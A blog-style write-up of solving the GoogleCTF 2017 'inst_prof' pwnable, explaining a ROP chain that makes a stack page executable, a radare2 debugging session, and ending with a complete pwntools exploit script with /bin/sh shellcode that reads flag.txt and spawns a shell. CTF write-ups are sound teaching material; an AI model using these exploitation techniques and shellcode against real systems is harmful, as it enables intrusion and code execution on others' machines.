Hey folks, here as promised – the 2nd blog post about breaking/cracking the GoogleCTF 2017 pwnable challenge “inst_prof”.
This time I wanted to realize the initial idea/vision I had when I first studied the binaries disassembly. You can read the other blog post if you want to learn more about my first approach/solution – which was a bit more based on what I found in other people’s writeups.
Right, so how do I usually plan to exploit a program/binary/pwnable? My philosophy almost always is KEEP IT SIMPLE. I am no fan of (too/overly) complex solutions and very much prefer simple, direct approaches. You know, KEEPING IT REAL 🙂
So, applied to this situation here, all I wanted to do, was this:
- Copy shellcode to the stack
- Make the stack area executable
- Jump to the shellcode (by using ROP, of course, due to NX)
In this blog post I’ll give you a quick run through the steps taken, the problems encountered and an overview of the final solution. So enough bla bla, let’s get it on.
It’s of particular importance to take a close look at memory locations and memory protection settings. If things don’t execute then it’s most likely due to missing permissions or some security mechanism that’s preventing us from winning.
Good for us is that we have this handy make_page_executable function in our binary’s code, which basically takes a “page” (a “block of memory” with a size of 0x1000 bytes) and changes the memory protection flags from “RW-” to “R-X”. Perfect for our purposes as you will see.
In order to change the memory protection of our shellcode memory area, we need to execute some “bootstrap” code which is only possible by utilizing the methodology of Return Oriented Programming (ROP). Thanks to the NX flag being set!
The ROP Chain Idea
The ROP chain we’ll be building is super simple. We just don’t need to do much to get what we want. So the structure is as follows:
00: pop rdi 08: address of shellcode-on-stack 16: make_page_executable() 24: address of shellcode-on-stack
Which means (translated to English):
- Load the address of our memory block, containing the shellcode, into register rdi
- Call the make_page_executable function (basically enabling code execution there)
- Be lazy and redirect program flow into our shellcode by putting its address as last address on the stack. Reason: The final ret instruction of make_page_executable will then pull it from there and jump to that address.
In the following explanation we’ll use three registers (r13-r15) for pointer operations (and hence “persistence”). As already explained in the previous blog post (please check it out if you want to dig a bit deeper since I just don’t wanna repeat myself too much here) these three registers won’t be modified by the program’s “framework” code. That’s why we can use them for our exploit.
Building a memory structure
First we need to find a nice place where to place our shellcode and the 32 bytes (4*8 QWORDs) of ROP chain data.
Important: make_page_executable basically is just a wrapper for mprotect and mprotect expects memory addresses to have a boundary alignment of 0x1000 bytes. So, in order to make this work, we need to adjust our target address (-> where to store our stuff) to be aligned to 0x1000.
Here a look into make_page_executable to show you that it’s a simple wrapper function.
You can see, it’s calling mprotect with a size of 0x1000 and flags to be 5 – which is READ | EXECUTE. The memory address is passed in register rdi.
Ok, my plan then had been to take the current stack pointer (rsp), increment it by 0x1000 (i.e. move ahead 0x1000 bytes) and align the result to 0x1000. The following bit of code achieves exactly that.
After that, we have an aligned memory address in r15, which is still in the stack’s memory space but a bit ahead and aligned to 0x1000.
My game plan also had been to, in the end, have the following memory structure at this specific stack address:
0x00 - 0x3f: memory area for our shellcode 0x40 - 0x5f: space for 4 ROP chain entries (8 bytes or 64 bit each)
So next thing to do: copy the shellcode to our “new” stack address:
And once this is done, we want to the ROP chain to begin at “new-stack-address” + 0x40. So we seek our pointer (here: r15) to that address and start building our ROP chain.
Populating the ROP chain
Simple stuff. We leak the return address of the function that brought us into the template. This return address has a PIE offset of 0xb18 – see the next screenshot.
So what we get from the stack is the real, memory mapped address of that rdtsc instruction. We’ll use that for calculating the other memory addresses we need in the ROP chain.
Now, let’s build the four ROP chain entries.
ROP chain entry 1
First we’ll place our well known “pop rdi” gadget. This gadget is at PIE offset 0xbc3 and hence (0xbc3-0xb18)= 0xab bytes ahead. We need to change one of our registers to hold exactly this address so that we can push it into the ROP chain.
Since we only have 4 bytes for instructions, we cannot just do a “add r13, 0xab“. Solution: Do 0xab repetitions of “inc r13; ret“. Slow – but works 🙂
And we then push this address to ROP chain position 0 (currently at r15).
This is a helper function and does the following:
Once this is done, we seek to the next ROP chain position (by adding 8 – one qword – to r15).
(which simply just 8 times inc’s r15).
ROP chain entry 2
We want to load rdi with the shellcode’s address (i.e. the start address of our “new”, 0x1000 aligned stack) so we need to push the address here. That’s easy.
ROP entry 3
Another calculation. This time we need make_page_executable and that one is at 0xa20 (which is 0xF8 bytes behind our leaked “rdtsc” instruction address).
So we seek there and stuff the address into our chain.
ROP entry 4
That’s again easy. We want the last ret of the make_page_executable function to “return” (i.e. “jump”) to our shellcode. So we just push our shellcode’s address in the ROP chain (or “future stack”).
That’s it for ROP! Simple and easy, that’s how I like it 🙂
Now all that’s left is to redirect the program flow by setting the ROP chain as new stack and “ret” into it.
Going for the Kill
We load the stack with our ROP chain (r15) …
… and lean back, self confident, winner-smile on the face, running the exploit code and watching the show to unfold …
Uhm…. WHAT?????????????????? NOOOOOOOOOO!!!! WTF???
Let’s find out ….
Band Aid For Our Shellcode (BAFOS) ™
Ok, let’s dive into this. We obviously missed something. radare2 to the rescue!
Setting a raw_input() right before the “trigger ROP chain” instruction, we cause Python to pause. Then, r2 attached, we set a breakpoint to our call_rbx instruction here:
I wonder if there’s something crazy happening in our ROP chain? Let’s see if we even reach our shellcode?! We’ll inspect this once we hit the breakpoint. So, let’s continue the program flow (r2: dc) and hit space bar to continue the Python flow.
Once there and r2 triggering the breakpoint, we inspect our ROP chain at r15.
This looks solid. So at 0x7ffe88588000 is our shellcode. Please also note the current memory protection settings (R W). Let’s inspect the shellcode.
Looks good! There’s our shellcode. We’ll now set a breakpoint there and continue the program flow and see whether we actually reach this (shellcode-) place.
Boom. There we go. Shellcode reached.
Now let’s inspect the environment and hunt for weirdnesses that might be reason enough to cause our shellcode to crash. First, memory protection settings – did our ROP-chain mprotect call work as expected?
Look for the entry marked with “*” (and that has rip in the description). Hint: It’s the fourth line from the bottom. This is the current memory page and also rip (current instruction pointer).
Reading this, we can conclude that this part of memory is currently protected “R-X” (which is good, because this means our mprotect callw orked and we can now read and execute our shellcode). All good, I’d say. This can’t be the reason for the crash.
Let’s continue and check the registers and hunt for weird stuff / problems.
Ok, WAIT … Our stack pointer rsp (of course – due to coming out of the ROP chain!) is also pointing to the current memory page address – which now is no longer writable (since make_page_executable removed that flag). You can clearly see the red “R X”. Not good. So the shellcode HAS to crash. A simple “push” instruction would lead to a permission violation and cause the crash. Very logical.
Checking the memory map again (scroll up!), it also becomes clear that the memory block BEFORE our new “shellcode area” (a.k.a. “the old stack”) is still protected RW- and is therefore very usable for stack operations. So, in order to get our shellcode working again, we simply pull the rsp 0x1000 bytes down to point to the previous memory block before going for the “/bin/sh” execve syscall.
And since pwntools is awesome, patching/extending the shellcode is done very (!) quickly:
That should do it. Saving. And retrying the exploit. Should work, eh?
Done! Game over – hello flag.txt! 🙂
This solution here is maybe not as elegant as the “read shellcode from STDIN” approach but seems to be way more dirty/straightforward since it doesn’t rely on many easy to reach ROP gadgets. I guess in more difficult pwnables this will be exactly the case.
That’s it. I’m pretty much done with this binary now and will move on to the medium and hard GoogleCTF pwnables. Will report my findings here, too! 🙂
Take care guys!
PS: Here the full Python code.
#!/usr/bin/env python2 from pwn import * context.arch = "amd64" context.timeout = 60 # execute a command by sending assembly representation of it into buffer # max buffer length: 4 bytes def execute(ASM): # compile asm, pad with nops to fill out all 4 bytes CODE = asm(ASM).ljust(4, asm("nop")) if len(CODE) > 4: print "More than 4 bytes", ASM sys.exit() p.send(CODE) # writes a stream of bytes into memory at r15 def bytes_to_r15(byteString): for b in byteString: execute("mov byte ptr [r15], %d" % ord(b)) execute("inc r15; ret") def inc_r13(offset): for x in range(offset): execute("inc r13; ret") def inc_r14(offset): for x in range(offset): execute("inc r14; ret") def inc_r15(offset): for x in range(offset): execute("inc r15; ret") # write r13 value to memory at r15 def r13_to_r15_rop(): execute("mov [r15], r13") def rsp_to_r15(): execute("mov r15, rsp; ret") def next_rop_r15(): for x in range(8): execute("inc r15; ret") # http://shell-storm.org/shellcode/files/shellcode-806.php # 64 bit Linux, execute /bin/sh shellcode = ( "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c" "\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52" "\x57\x54\x5e\xb0\x3b\x0f\x05" ) #open the process if args['REMOTE']: p = remote('localhost', 31337) else: p = process("./inst_prof") #print program prompt print(p.readline()) # planned ROP chain # 00: pop rdi # 08: shellcode-on-stack address # 16: make_page_executable # 24: shellcode-on-stack address+0x40 (ROP chain address) log.info("Aligning stack position for carrying shellcode+ROP chain ...") # get stack pointer rsp_to_r15() ###### Next, we move ahead on the stack and align the result 0x1000 so that mmap accepts it # stack+0x1000 (rsi: 0x1000) execute("add r15, rsi; ret") # align stack to 0x1000 execute("mov r13, rsi; ret") execute("dec r13; ret") execute("mov r14, r15; ret") execute("and r14, r13; ret") # diff to 0x1000 boundary now in r14 execute("sub r15, r14; ret") # r15 now has a page-boundary compatible address - compatible to mprotect # this is now the position of ROP + shellcode log.info("Calculated 0x1000 aligned stack position ...") # backup this to r14 execute("mov r14, r15; ret") log.info("Copying shellcode to stack ...") # copy shellcode to stack (r15) # shellcode neds to be patched to pull out the stack first 0x1000 bytes so that we land # in the R-W area since the shellcode needs a R/W stack for push/pop bytes_to_r15(asm("sub rsp, 0x1000;nop")+shellcode) # restore calculated stack pointer execute("mov r15, r14; ret") # pop RET address as "leaked" address execute("pop r13; push r13") # seek to ROP start position (8 qwords) inc_r15(8*8) # r15 now has the ROP chain address # calculate indexes for ROP gadgets (0xb18 is our leaked return address PIE offset) pop_rdi_offset = (0xbc3 -0xb18) # add make_page_executable_offset = (0xb18 - 0xa20) # subtract log.info("Building ROP chain [1/4] ...") # seek to "pop rdi" ROP gadget address by inc'ing r13 x times for x in range(pop_rdi_offset): execute("inc r13; ret") # store ROP gadget address at r15 (ROP chain pointer) r13_to_r15_rop() # seek to next ROP chain entry position next_rop_r15() log.info("Building ROP chain [2/4] ...") # get shellcode address (begin of 0x1000-aligned stack) execute("mov r13, r14; ret") # and store in ROP chain r13_to_r15_rop() # seek to next ROP entry next_rop_r15() log.info("Building ROP chain [3/4] ...") # get leaked RET execute("pop r13; push r13") # seek to address of make_page_executable for x in range(make_page_executable_offset): execute("dec r13; ret") # store address in ROP chain r13_to_r15_rop() # seek to next ROP entry next_rop_r15() log.info("Building ROP chain [4/4] ...") # get shellcode address (begin of 0x1000-aligned stack) and store in ROP # this makes the RET from make_page_executable return there execute("mov r13, r14; ret") r13_to_r15_rop() # that's all! now redirect flow to ROP chain log.info("ROP chain build complete - now redirecting program flow and triggering the shellcode ...") # get 0x1000-aligned new stack address execute("mov r15, r14; ret") # seek to 0x40 which is the start of the ROP bytes inc_r15(8*8) #raw_input() # rock'n'roll ! execute("mov rsp, r15; ret") # flush buffers p.clean() # retrieve flag p.send("cat flag.txt\n") # go interactive p.interactive()